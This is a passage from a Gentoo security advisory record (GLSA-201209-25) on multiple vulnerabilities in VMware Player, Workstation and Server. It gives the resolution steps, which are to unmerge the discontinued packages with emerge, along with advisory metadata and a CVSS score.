Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nGentoo discontinued support for VMware Player. We recommend that users unmerge VMware Player: \n \n \n # emerge --unmerge \"app-emulation/vmware-player\"\n \n\nNOTE: Users could upgrade to \u201c>=app-emulation/vmware-player-3.1.5\u201d, however these packages are not currently stable. \n\nGentoo discontinued support for VMware Workstation. We recommend that users unmerge VMware Workstation: \n \n \n # emerge --unmerge \"app-emulation/vmware-workstation\"\n \n\nNOTE: Users could upgrade to \u201c>=app-emulation/vmware-workstation-7.1.5\u201d, however these packages are not currently stable. \n\nGentoo discontinued support for VMware Server. 
We recommend that users unmerge VMware Server: \n \n \n # emerge --unmerge \"app-emulation/vmware-server\"", "edition": 1, "modified": "2012-09-29T00:00:00", "published": "2012-09-29T00:00:00", "id": "GLSA-201209-25", "href": "https://security.gentoo.org/glsa/201209-25", "type": "gentoo", "title": "VMware Player, Server, Workstation: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}